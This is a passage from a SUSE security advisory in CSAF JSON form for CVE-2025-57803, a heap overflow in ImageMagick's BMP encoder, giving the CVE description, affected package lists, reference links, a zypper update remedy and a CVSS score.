"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u0027s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 x width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-57803",
"url": "https://www.suse.com/security/cve/CVE-2025-57803"
},
{
"category": "external",
"summary": "SUSE Bug 1248784 for CVE-2025-57803",
"url": "https://bugzilla.suse.com/1248784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
